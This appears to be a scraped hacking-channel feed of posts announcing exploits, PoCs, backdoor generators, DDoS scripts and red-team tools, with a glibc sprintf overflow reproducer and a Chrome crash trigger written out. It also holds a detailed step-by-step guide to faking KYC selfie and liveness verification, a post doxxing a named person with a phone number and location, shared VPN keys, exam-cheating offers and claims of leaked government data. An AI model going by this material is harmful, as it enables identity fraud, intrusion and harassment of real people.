    +1,234,567   :

Confirmed that this could potentially cause a buffer overflow with sprintf, something like below. This will occur in the corner case where an application computes the size of the buffer to be exactly enough to fit the digits in question, but sprintf ends up writing a couple of extra bytes, hence going beyond bounds.

    #include <stdio.h>
    #include <locale.h>
    #include <string.h>

    int main (void)
    {
      /* Exactly enough room for 13 columns, ':' and the terminating NUL */
      char buf[strlen ("1234567890123:") + 1];
      __builtin_memset (buf, 'x', sizeof (buf));
      if (setlocale (LC_ALL, ""))
        {
          printf ("1234567890123:\n");
          printf ("%0+ -'13ld:\n", 1234567L);
          /* On glibc 2.37 this writes past the end of buf */
          sprintf (buf, "%0+ -'13ld:", 1234567L);
          for (size_t i = 0; i < strlen ("1234567890123:") + 1; i++)
            {
              printf ("%c", buf[i]);
            }
          printf ("\n");
        }
      return 0;
    }

To finish, building with _FORTIFY_SOURCE should catch this problem immediately:

    💾$ gcc -D_FORTIFY_SOURCE=1 -O -o sprintf-test sprintf-test.c

And run:

    💾$ LOCPATH=$PWD/localedata LC_ALL=en_US.UTF-8 ./elf/ --library-path .:./math:./elf:./dlfcn:./nss:./nis:./rt:./resolv:./mathvec:./support:./crypt:./nptl ../sprintf-test
    1234567890123:
    +1,234,567 :
    *** buffer overflow detected ***: terminated
    Aborted (core dumped)

🛡 Fixed here (github mirror, backport to release/2.37/master): "Account for grouping in printf width".
2023-02-11 03:02:35
2023-02-10 12:35:29
2023-02-10 12:35:28
2023-02-10 11:54:38
Huge !! ❤️ 🇮🇳
Probably in response to the recent MEA mail server attack, APT group Sidewinders hackers have compromised 7.5 TB of email and official data of the Ministry of Foreign Affairs Pakistan.
Indian email data of almost 25GB was on the darkweb. Investigation of the Indian mail server breach is already in process.
2023-02-10 11:26:26
2023-02-10 09:46:53
0Day Avalanche Blockchain API Dos POC Video
2023-02-10 09:36:35
OWASP WrongSecrets | Vulnerable app with examples showing how to not use secrets
2023-02-10 07:00:41
2023-02-10 06:54:10
Ministry of Foreign Affairs Pakistan
7.5 TB of Internal & Email Data is compromised. Few Samples Attached
@sidewinders
2023-02-10 05:38:17
2023-02-10 05:35:20
Pakistani Diplomat Sexual Harassment with Amna Umer Barcelona.
2023-02-10 01:17:39
FATF PAKISTAN MEETING WAS BREACHED. Just Before being out of Grey List.
2023-02-09 15:24:07
This time not only a blog, but let's learn with a detailed step-by-step video.
If you like our content then please support us by subscribing and watching the full video.
Let's grow and spread Cyber Security
2023-02-09 15:17:03
A new Blog on Metasploit.
Learn Metasploit in a professional way like Cyber security professionals.
Here is the link to the detailed blog.
2023-02-09 14:36:31
Today I ffound A so cold FB,Insta And Google HackerTelegram Name:- SavataHer no. +91 63628 93283Real_Name : rajni kaneriLocation: karnataka
2023-02-09 11:00:52
🧰 OperatorsKit is a collection of tools that integrate with Cobalt Strike through BOFs.
Link:-
2023-02-09 10:06:25
IoT-PT
A Virtual environment for Pentesting IoT Devices
2023-02-09 09:50:22
You don't need to buy a GPU for machine learning work!
There are other alternatives. Here are some:
1. Google Colab
2. Kaggle
3. Deepnote
4. AWS SageMaker
5. GCP Notebooks
6. Azure Notebooks
7. Cocalc
8. Binder
9. Saturncloud
10. Datalore
11. IBM Notebooks
Spend your time focusing on your problem. 💪💪 Let others worry about the hardware!!
2023-02-09 07:21:53
ssc-asi-tools - SecurityScorecard Attack Surface Intelligence tools repository with a python suite of tools.
Link:-
2023-02-08 17:54:03
2023-02-08 17:54:02
2023-02-08 17:22:44
Blue Team / Incident Response 👨‍💻
This github repository contains a collection of 35+ tools and resources that can be useful for blue teaming activities.
#BlueTeam #Infosec
2023-02-08 16:58:20
2023-02-08 09:21:48
Recovery script for ESXiArgs ransomware
Recovery Script:-
2023-02-07 10:10:28
2023-02-07 09:32:45
Mobile Application Penetration Testing Cheat Sheet 📒
#Infosec #Android #Ios #Tech #Cyber #BugBounty #Security
2023-02-07 09:31:21
Mini description of linux file permissions. Found this helpful!
#Linux #infosec #cybersecurity
2023-02-07 05:27:04
Exploit for an actively exploited zero-day vulnerability affecting the GoAnywhere MFT administration consoles.
Exploit:
2023-02-07 01:19:18
2023-02-07 01:19:17
2023-02-06 14:06:32
Apache SCXML RCE (PoC included) + Article
Link:-
2023-02-06 13:35:29
A new post for those who want to learn Metasploit and Meterpreter.
Hi Cyber learners
Check my new post + Video on Metasploit and Meterpreter.
How to Use Metasploit | Meterpreter | Reverse shell | Metasploit Tutorial
2023-02-06 11:13:59
All Common Ports Enumerations and Exploitations
2023-02-06 10:24:47
2023-02-06 08:22:22
A public collection of POCs & Exploits for the vulnerabilities I discovered
2023-02-05 18:03:51
2023-02-05 18:03:50
2023-02-05 13:00:40
Hi all, a new blog on Smurf attack is now here.
Learn the technique to perform this DDoS attack.
Here is the link to the blog
2023-02-05 06:07:31
2023-02-04 16:10:35
Microsoft Exchange: OWASSRF + TabShell (CVE-2022-41076)
The TabShell vulnerability is a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.
For a detailed write-up see research:
PoC:
#ssrf #tabshell #poc
@virus303
@NetEditors
2023-02-04 15:27:28
📡 Space Jam: Exploring Radio Frequency Attacks in Outer Space
Download:-
2023-02-04 14:53:20
CVE-2021-21974 | Ransomware targeting VMware ESXi
These attacks are detected globally and especially in Europe. According to experts from the ecosystem as well as authorities, they might be related to Nevada ransomware and are using CVE-2021-21974 (OpenSLP as used in ESXi has a heap-overflow vulnerability) as the compromise vector. Investigations are still ongoing to confirm those assumptions.
Exploit:-
2023-02-04 12:29:43
Want to learn about OSINT (Open Source Threat Intelligence) and Threat Intelligence Tools?
Check our new blog on:
What is OSINT? | OSINT Framework | Tools for OSINT | Best OSINT Techniques
Here is the link to his blog.
2023-02-04 12:05:07
CVE-2023-25135
vBulletin - RCE + exploit
Link:-
2023-02-04 10:10:09
CVE-2022-22583 CVE-2022-22616 CVE-2022-22639 CVE-2022-26690 CVE-2022-26712 CVE-2022-26728 CVE-2022-32786 CVE-2022-32800
2023-02-04 08:35:58
🪂 Standout as Web design Expert Course 🪂Download link-🔐 Zip Password- @udemyking1✦•━━━━━━━━━━━━━━━━━•✦👉 𝑀𝑢𝑠𝑡 𝐿𝑖𝑘𝑒 & 𝐹𝑜𝑙𝑙𝑜𝑤 𝑂𝑢𝑟 𝑃𝑎𝑔𝑒𝑠👇🔷 𝒀𝒐𝒖𝑻𝒖𝒃𝒆 ➛🔶 𝑭𝒂𝒄𝒆𝒃𝒐𝒐𝒌 ➛🔷 𝑳𝒊𝒏𝒌𝒆𝒅𝑰𝒏 ➛🔶 𝑰𝒏𝒔𝒕𝒂𝒈𝒓𝒂𝒎 ➛🔷 𝑱𝒐𝒊𝒏 𝑭𝒂𝒔𝒕 ➛✦•━━━━━━━━━━━━━━━━━•✦
2023-02-03 22:28:22
2023-02-03 22:28:21
2023-02-03 14:54:19
2023-02-03 11:42:03
2023-02-03 08:37:11
💥 Cobalt Strike BOF that bypasses AMSI in a remote process with code injection.
Download:-
2023-02-03 08:36:23
Needle (CVE-2023-0179) exploit
Download:-
2023-02-03 08:33:23
💥 If a web application allows you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE.
2023-02-02 23:00:59
🔥🔥🔥 Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit (CVE-2023-21608)
Download:
2023-02-02 22:49:09
🔥 Chrome heap buffer overflow in validating command decoder (CVE-2022-4135)
Heap BoF/OOB access in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a SBX via a crafted HTML page.
🛡 Patch CL
Exploit strategy:
The vulnerability immediately provides an attacker with an extremely powerful exploitation primitive -- a non-linear BoF with a controlled offset.
Exploit flow:
The exploit abuses the command buffer and GLES2 APIs for memory manipulation. A corrupted memory bucket is used to first leak data from the GPU process and break ASLR, and then, when the ROP chain is ready, hijack the control flow.
reproduce:

    <script>
      canvas = document.createElement("canvas");
      document.documentElement.appendChild(canvas);
      context = canvas.getContext("webgl2");
      context.blendColor(0, 0, 0, 0);
    </script>

⚠️ Part of an exploit chain: CVE-2022-4135 + CVE-2022-3723
2023-02-02 22:42:46
🔥 Brave browser 1 day exploit.
This is a remote crash that triggers in Brave browser due to how the RSS XML parsing happens by reading an item's title that contains the < (less than) character.
Download:
2023-02-02 18:45:54
2023-02-02 11:45:06
2023-02-02 10:01:44
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Download:
2023-02-02 09:48:32
#RedTeam #hack #tools
Collection of 100+ tools and resources that can be useful for red teaming activities.
2023-02-02 09:23:49
📲 Enzyme is a jailbreak-free iOS modding framework that allows you to statically patch and hook iOS apps. This repository contains an example using Enzyme. For modifying this, check out the CMakeLists.txt file, the patcher/ file, the patcher/bootstrap.asm file, and the src folder.
Download:-
2023-02-02 05:04:52 my Motivational And Infosec Blogs.
2023-02-02 04:57:51 @hacklathon
2023-02-02 04:56:05
2023-02-01 12:33:08
Master OAuth 2.0 Vulnerability #bugbounty #infosec  Difficulty : Any OAuth 2.0 Resources :👇• • • • • • • • • • • • • • • • • • • • • • • • You For Reading this 🙏Hope You'll like 👍 it
2023-02-01 10:33:30
2023-02-01 09:50:05
2023-02-01 09:40:48
2023-01-31 13:12:37
🔥🔥🔥 VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
This vulnerability is exploitable in the default configuration for VMware vRealize Log Insight. We have successfully reproduced this exploit and would like to provide the technical details about how this vulnerability works.
💥 PoC for VMSA-2023-0001 affecting VMware vRealize Log Insight, which includes the following CVEs:
💾 VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706)
💾 VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704)
💾 VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)
Download:
2023-01-31 11:43:12
PoC of CVE-2021-34514 (Windows Kernel EoP vuln, ALPC OOB)
Download:
2023-01-31 09:55:09
CVE-2022-26485 exploit (UAF in XSLT parameter processing, bugzilla)
Removing an XSLT parameter during processing could have led to an exploitable use-after-free. Mozilla have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.
⚠️ Tested against Firefox 78.0 (Windows)
Download:
2023-01-31 07:17:44
The shortest payload for a tiny php reverse shell written in 19 bytes using only non-alphanumeric characters. Hex values inside ⛶ indicate raw bytes.
This will help to bypass WAF and execute PHP reverse shell for RCE.
Download:
2023-01-30 16:59:32
OSINT tool to investigate GitHub profiles your WhatsApp messages on Telegram Windows x86 API hooking and modification directory and files from cli to ios and android devices without need of an extra clien app
2023-01-30 16:59:31
 CVE-2023-23560 flaw exposes 100 Lexmark printer models to hack
2023-01-30 09:47:36
hackebds(2023.1.29 0.3.3)Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal,Pure static backdoor .Armv5, Armv7, Armv8, mipsel, mips,mips64,mipsel64,powerpc, powerpc64,sparc,sparc64 are now supported, and they are still being updated (PS:bash support is added to the reverse shell after version 0.3.1). If the backdoor of the reverse shell is generated with the - power parameter, the reverse shell will continue to be generated on the target machine)Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips, mips64, mipsel64, powerpc, powerpc64,sparc are now supported, and they are still being updated|Generate bind of various architectures bind_Shell file.Support command line generation backdoor and shell code, Strong anti hunting ability,characterized by light, small, efficient and fastDownload:
2023-01-30 09:39:12
MYBB_1.8.32_LFI_RCE
MyBB 1.8.32 – Chained LFI Remote Code Execution (RCE) (Authenticated) python exploit script…
Download:
2023-01-30 09:32:05
2023-01-30 09:31:49
2023-01-29 17:22:07
⚙️ Complete Bug Bounty tool List ⚙️Enjoy :)dnscan https://nmap.orgMasscan Machine https://web.archive.orgwaybackurls Sn1per Apktool Injector JSON Web Token Toolkit the Web Tools @freehackingresources
2023-01-29 17:17:00
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..♾♾
2023-01-29 12:18:56
2023-01-29 11:56:55
Exploit for full access to disk C:\  (for all users)Download:
2023-01-29 10:39:34
Bugbounty Notes 📒
Includes OWASP Top 10 and more
#bugbounty #Infosec
Amazing Git Repo : This Out 👌
2023-01-29 08:37:29
2023-01-29 05:47:41
2023-01-29 01:43:39
Rust PDF builder
It includes these premade templates:
- adobeacrobate
- dropbox
- googledrive
- office365
- onedrive
Custom Templates (Own PDF files) will also work.
Usage: rust-pdf-creator.exe <input_url> <template/file/list>
Example: rust-pdf-creator.exe onedrive.
Download:
2023-01-28 13:50:01
2023-01-28 12:36:22
KillMyOTA
OTA Killer for iOS 15.0 - 16.1.2
Download:-
2023-01-28 12:35:06
#DDoS Scripts and Methods
L7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)
This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.
Note: Scripts written in 'C' need to be compiled with GCC compiler, first.
2023-01-28 12:33:17
sshd_backdoor
About
Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.
Main Process in ebpf program:
- Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.
- Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.
- Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.
- Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.
Download Link:
2023-01-28 12:29:19
2023-01-28 11:30:45
2023-01-28 05:18:17
gg's hacker's ( have a good day —❤️ ‼️Here we go again Get a (.in) Free Domain for 1 Year! Offer valid from 26-30th January 2023. condition is youw ill get 1 Domain for Free.Website #hacker_bano_chutiya_nhe 🌜👾🌛
2023-01-28 02:11:30 join this channel for more updates .........
2023-01-28 02:10:59
Sourcecode & Sensitive Leaks.NTDC Tripping Server.
2023-01-27 14:44:02
Dear all user's i am deleting this id sorry and wait @hayper007. I am coming with new account Don't sand msg 2hrsRe promot me 😂
2023-01-27 14:02:59
I Can Help You To Clear & Give the training & exam solutions on the below certifications1_CEH.2_CEH Practical.3_eJPT.4_eCCPTv2. 5_eWPT. 6_eWPTxv2.7_CRTP. 8_CRTO. 9_OSCP. 10_OSWE.11_OSEP. 12_OSWP. 13_CPENT 14_CHFI15_eCPTxv216_PNPT17_Burpsuite exam Remote Exam Support possible. If anyone needs message me.Lower prices & passing guaranteed!Follow: @examsolutionzWe have added new exam of burpsuite solutions
2023-01-27 09:08:56
2023-01-27 09:08:55
2023-01-27 07:11:23
#Red_Team_Tactics
1. Proxying DLL Loads For Hiding ETWTI Stack Tracing
2. Python module for running BOFs
2023-01-27 07:11:22
#Sec_code_review
Statistical Analysis to Detect Uncommon Code
2023-01-27 06:24:41
Whacking a phishing admin panel for fun and profit
January 26, 2023 at 10:32AM by thehunter699 via reddit
2023-01-27 06:23:37
Gank-RECON
Subdomains enumeration, various scans and testing of some vulnerabilities.
2023-01-27 06:20:27
OpenCVE
OpenCVE is a platform used to locally import the list of CVEs and perform searches on it (by vendors, products, CVSS, CWE...).
Users subscribe to vendors or products, and OpenCVE alerts them when a new CVE is created or when an update is done in an existing CVE.
2023-01-26 13:57:41
#Malware_analysis
"Fighting to LODEINFO: Investigation for Continuous Cyberespionage Based on Open Source", 2023.
]-> LODEINFO Triage Tools:
2023-01-26 13:57:40
#exploit
1. CVE-2022-38181: Vulnerability in the Arm Mali GPU
2. CVE-2023-0210: Linux Kernel Unauthenticated Remote Heap Overflow Within KSMBD
2023-01-26 13:57:39
#Threat_Research #Blue_Team_Techniques
1. At the Edge of Tier Zero: The Curious Case of the RODC
2. Sigma Rule to Detect Uncommon Keyboard Layout Loads
]-> Sysmon Config:
2023-01-26 12:19:51
☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️#GiveawayOnRepublicDayTryHackMe 1 Month 3 Vouchers Giveaway...If Anyone is interested in this giveaway then Dope-Me(DM)...with your TryHackMe IDWe'll review your TryHackMe account and based on your progress we will try to ask some basic questions...After that you will be given your TryHackMe Coupon...Dm :- @lexlegion☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️☠️
2023-01-26 09:59:28
2023-01-26 06:13:37
Pakistan, wish your daddies a happy Republic Day.
2023-01-26 02:17:44
Heartfelt wishes for Republic Day ❤️
2023-01-25 20:50:10
2023-01-25 17:44:03
Mullvad VPN Key  7689329868339684 42284748319087392678008071148699 6390042299824693 All key valid for 14 daysEnjoy all 😂
2023-01-25 13:20:43
2023-01-25 11:49:25
Ever wanted to get payload from packed android malware without running android emulator/device? kavanoz make this!
2023-01-25 08:30:27
🔰 NEW TOOL FOR PHONE UNLOCK PATTERNS AND PINS 🔰Ⓜ️REQUIREMENTS :Internet : 50 MBphpStorage : 50 MBngrok Features :[+] Real pattern hacking ![+] Updated maintainence ![+] Ngrok link[+] Easy for Beginners !INSTALLATION [Termux] :$ apt-get update -y$ apt-get upgrade -y$ pkg install python -y$ pkg install python2 -y$ pkg install git -y$ pip install lolcat$ git clone$ cd $HOME$ ls$ cd hacklock$ ls$ bash setup$ bash[+]--Now you need internet connection to continue further process and Turn on your device hotspot to get link...[+]--You will recieve patter pin in below image you can see pattern with numbers[+]--You can select any option by clicking on your keyboard[+]--Note:- Don't delete any of the scripts included in core〰〰〰〰〰〰〰〰〰〰〰〰〰
2023-01-25 06:46:01
#hardening
A tool for checking the security hardening options of the Linux kernel
2023-01-25 06:46:00
#Red_Team_Tactics
1. Elevation of Privilege from Local Admin to gMSA
2. Keeping LSA secrets out of physical memory
3. Basic SSTI - Server-Side Template Injection (2023)
2023-01-25 03:13:25
2023-01-25 02:35:45
Internet Camera Exploitation Tool
This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io
I was able to discover thousands of vulnerable cameras using it
Tool:-
2023-01-25 02:33:44
WordPress Plugin Elementor 3.6.2 – Remote Code Execution (RCE) (Authenticated)
Date: 04/16/2022
Exploit:-
2023-01-24 13:44:38
#Research
"StealthyIMU: Stealing Permission-protected Private Information From Smartphone Voice Assistant Using Zero-Permission Sensors", NDSS 2023.
]-> Repo:
2023-01-24 13:44:37
#exploit
1. A Step-By-Step Introduction To The Use Of ROP Gadgets To Bypass DEP
2. b3typer - Simple typer bug
3. CVE-2022-2347: U-Boot - Unchecked Download Size/Direction in USB DFU
2023-01-24 13:44:36
#Malware_analysis
1. Analyzing Malicious OneNote Documents
2. Roaming Mantis implements new DNS changer in its malicious mobile app in 2022
2023-01-24 08:17:35
A #browser_extension for OSINT search all-in-one Red Team #extension for Web Pentest
2023-01-24 07:19:05
Bug : Facebook Group Members Disclosure
Intro : A non-member can determine if someone is a member of a private group or not via the CometHovercardQueryRendererQuery graphQL mutation.
Video POC:-
2023-01-24 03:29:55
Java XML security issues and how to address them
2023-01-23 17:54:51
2023-01-23 16:17:49
#DFIR
ShareFinder: How Threat Actors Discover File Shares
2023-01-23 16:17:48
#Threat_Research
Traffic signals: The VASTFLUX Takedown
2023-01-23 16:17:47
#Analytics
Cybersecurity Trends Q1/23:
⬆️ Pwd spraying/creds stuffing;
⬆️ Phishing w/ new file types, eg .one, .iso, .lnk;
⬆️ Rust malware / loaders (+Go +Nim +Zig);
⬆️ Sliver implants;
⬆️ Abused legit RA software;
⬆️ Abused legit encryption tools (ransom);
⬆️ Token/Cloud API abuse;
⬇️ Malware attacks on non-standard ports;
⬇️ E-Skimming Incidents;
⬇️ Office Macros.
2023-01-23 16:17:46
#Offensive_security
1. Cobalt Strike Beacon Object File for kernel exploitation using AMD's Ryzen Master Driver (version 17)
2. A script to automate privilege escalation with CVE-2023-22809 vulnerability
2023-01-23 15:47:01
SQLi Hunter v2 is a python program that checks for SQL (and Blind) injection vulnerability in URLs. The program is designed to be easy to use, practical and beneficial. The intention of this tool is to include it in your ethical Bug Bounty Hunting methodology. Please do not use this tool on any website without having its permission.
2023-01-23 15:40:32
PhoneSploit Pro
PhoneSploit with Metasploit Integration.
An All-In-One hacking tool to remotely exploit Android devices using ADB and Metasploit-Framework to get a Meterpreter session.
2023-01-23 15:23:21
Echidna – A Fast Smart Contract Fuzzer
Echidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley)
2023-01-23 11:51:52
[META BUG BOUNTY 2023] - Video Poc
2023-01-23 11:43:26
CVE-2023-22809 – sudo Privilege escalation
Affected sudo versions: 1.8.0 to 1.9.12p1
This script automates the exploitation of the CVE-2023-22809 vulnerability to gain a root shell.
Script:
2023-01-23 10:28:32
Solaris 10 LPE Exploit
Download:
2023-01-23 06:07:47
90% of Pakistan is out of electricity after a major cyber attack on electricity systems.
2023-01-23 00:05:53
Hi Techies, Ethical Hackers and Cyber security enthusiasts. I am offering a great opportunity to you all to work with us at Techofide.Here is the link to apply: for your responses everyone! Have a great day😀
2023-01-22 17:58:02
#tools
Utility to find hidden Linux kernel modules
]-> LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64):
2023-01-22 17:58:01
#exploit
1. CVE-2022-42864: Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition")
2. CVE-2022-25637: Multiple TOCTOU vulns in peripheral devices (Razer, EVGA, MSI, AMI)
2023-01-22 15:38:13
2023-01-22 15:38:12
📚 ILLEGAL7 HACKERS ALL COURSES 📚Software cracking🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course🟢Ransomware virus course 🟢Reverse Engineering Course🟢Software Cracking CourseSize : 6.11 GB⬇️Link :- : Theillegalhacker7@@@
2023-01-22 10:38:25
CVE-2023-0398 modoboa – mail Server
Description
GET /admin/domains/{id}/delete/ page is vulnerable to a CSRF attack.
Exploit:
2023-01-22 10:11:29
Facebook 0-day Bug (account takeover) Still not patchedcheck out now :
2023-01-22 09:47:29
2023-01-22 05:54:36
2023-01-22 04:18:10
2023-01-22 02:23:55
2023-01-21 17:01:11
#UAV #UAS #UUV #forensics #security #vulnerabilities
2023-01-21 17:01:10
🕵️‍♂️ Twitter Search Guide (extended version)
#osint #twitter
2023-01-21 13:25:49
2023-01-21 13:25:48
2023-01-21 13:20:36
Linux kernel stack buffer overflow in nftables (CVE-2023-0179)
The vulnerability consists of a stack BOF due to an integer underflow vulnerability inside the nft_payload_copy_vlan function, which is invoked with nft_payload expressions as long as a VLAN tag is present in the current skb.
⚠️ The exploitation could allow the leakage of both stack and heap addresses and, potentially, a LPE to the root user via arbitrary code execution.
Exploit:
2023-01-21 13:00:01
Get GPT like chatGPT on your terminal
2023-01-21 12:09:35
#Blue_Team_Techniques
"Best Practices for MITRE ATT&CK Mapping", January 2023.
2023-01-21 12:09:34
#DFIR
The Key to Identify PsExec
2023-01-21 12:09:33
#tools #Cloud_Security
1. Kubernetes exploitation tool
2. Azure Attack Paths Management
2023-01-21 10:59:04
2023-01-21 03:08:26
2023-01-20 19:37:19
The search engine has launched an AI chatbot called youChat 💻 The chatbot can answer questions and hold conversations, much like the ChatGPT bot, although it has considerably less functionality than the latter. The developers say that adding youChat significantly expands the ability to find the information you need on the Internet. It can help with simple answers to general questions, suggesting ideas, translation, summarizing text, composing emails, and writing code. However, the system is still in beta testing, and the developers do not recommend taking all of the bot's answers on faith.
2023-01-20 19:25:04
#exploit1. CVE-2022-47966:RCE vulnerability in multiple ManageEngine (Apache Santuario (xmlsec) <=1.4.1) products]-> CVE-2022-39955:Charset confusion + WAF bypasses via 0days Microsoft Teams RCE
2023-01-20 13:25:05
Android Exploit to get a System based shell (UID 1000) on ANY Samsung Mobile Device based on CVE-2019-16253
1) Downgrade to vulnerable SamsungTTS app
2) Install exploit APK
3) Exploit vulnerability to achieve System rights
2023-01-20 12:50:43
🔥🔥🔥 FoxitReader Precise Heap Spray 0c0c0c0c bc.
⚠️ Tested version:
2023-01-20 12:26:49
Google Chrome “SymStealer” (CVE-2022-3656)
2023-01-20 12:19:21
2023-01-20 11:12:24
Centreon Map plugin allows pre-auth remote process memory dump (CVSS 8.3) - PoC
January 19, 2023 at 12:33PM by qwerty0x41 via reddit
2023-01-19 15:28:33
2023-01-19 15:09:30
2023-01-19 14:21:29
#exploit
1. CVE-2023-0179: Linux kernel stack buffer overflow in nftables
2. Security Audit of Git:
CVE-2022-23521: Truncated Allocation Leading to Out of Bounds Write Via Large Number of Attributes
CVE-2022-41903: Out of Bounds Memory Write in Log Formatting
2023-01-19 14:21:28
#tools #Blue_Team_Techniques
1. MIMEDefang - e-mail filtering tool that works with the Sendmail "Milter" library
2. Automated Penetration Testing Reporting System
2023-01-19 06:19:28
Some internal IPs from pak
2023-01-19 03:13:19
Learn SQLI In A Easy Way
2023-01-19 02:44:43
2023-01-18 08:01:43
2023-01-18 07:11:12
2023-01-17 18:09:35
After you have your TikTok account ready, open your selfie on you PC, make anew video on TikTok and select “Dynamic Photo” filter.After you selected your filter, point your camera to the selfie that's on you PC andyou will see that the selfie is moving, smiling, rotating their eyes, etc.Record a small video and upload it to TikTok (Make sure its public)After its uploaded, go to: (ticktock video downloader ) and paste your video link toDownload your video without the TikTok tag.After that its easy, go to OBS, under “Sources” select “Media” and select yourTikTok video that you just downloaded.My targeted website requires me to verify thru my phone.This part if you service only serve through AppsFor this, you would need a few tools:● LDplayer (Android Emulator)● Logitech capture softwareAfter you downloaded those 2 tools, create a new LDplayer android emulatorwindow and select 640x640 resolutionThen, open Logitech capture software, open you selfie/docs photo, selectresolution to 1080p and then in “Source 1” select your opened photo title. Thenhead to ManyCams, select camera source as “Logi Capture”.Then, head back to your android emulator, go do your kyc and when emulator askif you want to use webcam or screen crop, select webcam and you should seeyour uploaded photo right there, go on resize or change position of the photo ofyour needs and take the picture.Thats it! This should be enough to bypass a lot of kyc providers and will allow youto easily verify your account!Download links:OBS: capture:
2023-01-17 18:00:33
How To Bypass Selfie Verification❓Table of content● Know KYC Verification mechanism● How to fake live webcam● How to fake rotate head verification● How to make you selfie more alive● How to fake phone required kyc● ResourceOld Standart : Upload Document and Photo with Signature or Holding Written Name and service  on cardboard (example old binace if i remember correctly service before 2013 ?)ScanFace: Simple Request to scanning faceRotated head: Require you rotate you head folowing the circle Blink Life Test : Require you to blink follwong countdown orderID Card+Face Selfie + Mostly Populer among Indonesia Apps like E-wallet and exchangerFaking the WebcamMost of website this day enforce verification through selfie-life cam, site will ask you to allow turn on camera and record you face, which can have serios consequence if company you use are not good in keeping their data.There way to counter this defense  You need to download:● OBS (With virtual cam plugin)● ManyCams -- Not free please go to reddit piracy megathread to find safe and clean pirate versionSome of download links will be available at the last page of this thread.Install both of them and ready your docs.Now, open OBS and under “Sources” tab click on “+” and then “Image”Then, select your image path and press okay. You will see your selected image on OBS.Now, open ManyCams, go to “Text” tab and uncheck “Show ManyCams logo”Go back on OBS and click on “Start Virtual camera”Now, go back to your website that you try to verify and start the webcam verification, allowaccess and you should see your selected photo on the webpage.You can change the photo position (If you doing selfie verification, so the face would go into the“Head bubble”) on OBS by moving the picture or change the size of it by grabbing the corner ofthe photo. 
(Red line)"If your KYC puts you to fullscreen as soon as you start the verification and cancelsout if you exit the fullscreen, open OBS, then Start the verification and as soon asyou go to fullscreen, ALT+TAB to OBS window so the verification won't becancelled and you will be able to move your picture around.After that just size your picture to you needs and take the photo."This one of difficult partDamn, that was easy. But my verification requires me torotate my head.A lot of KYC requires you to do that. To bypass that, head to: and create an account there (It requires you to do aPost by @hayper007small donation to use their services, i highly advise you to do that as it will helpyou in your KYC bypass journey)After you successfully created your account and made a small donation, start anew project and then select “Image” and then “Add”.After that you will see your photo on the website, then you should see a smallmenu in the middle up, select “Mode to draw smooth shapes”.After you selected the correct mode, carefully draw a shape around your selfies head.After you did it, you should see your selected area lighter than the background.Post by @hayper007On the left side you will see a small box, select “Rotation mode” and slightly move your cursor in the box area to rotate the selected area.After you managed to make your selfie a 3D model, you can recordyour screen rotating your head and then in OBS under “Sources”tab selecting “Media source”Or, you could select “Window capture” and selecting the“Smoothie-3d” tab and rotating your head live when you doing yourKYC verification.Post by @hayper007Okay, but my selfie looks “Not real”, how do i make it morealive?Note: this part of method involving you using phone to create resource for part of method.Some of the HQ websites (Banks, main crypto exchange sites, etc) could see thatyour selfie is a plain photo as it doesn't have any “Liveliness” in it.To bypass that, you need 2 things.● TikTok account● Smartphone with working 
cameraIf you have that, go ahead and download TikTok and create an account.
2023-01-17 14:40:36
Post from @hayper007
2023-01-17 14:40:35
Post from @hayper007
2023-01-17 14:40:34
Post from @hayper007
2023-01-17 14:28:06
#Malware_analysis 1. Analyzing Rhadamanthys Stealer BianLian Ransomware (Decrypted)
2023-01-17 14:27:36
Class Starting At 8:00 Pm. Join Now. Invite Link (Web) :
2023-01-17 14:18:22
#Hardware_Security How Signal Works inside the Kernel
2023-01-17 14:18:21
#tools #Threat_Research 1. Detection of Lateral Movement with the Sliver C2 Framework ]-> Java code inspector for web vulnerability scan Survey of security mitigations and architectures, December 2022
2023-01-17 14:18:20
#exploit 1. Redis 6.0.16 - RCE Linux kernel exploit development
2023-01-17 14:18:19
#tools #Red_Team_Tactics 1. Forensia - Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase VirusTotalC2 - Abusing VirusTotal API to host C2 traffic
2023-01-17 11:53:20
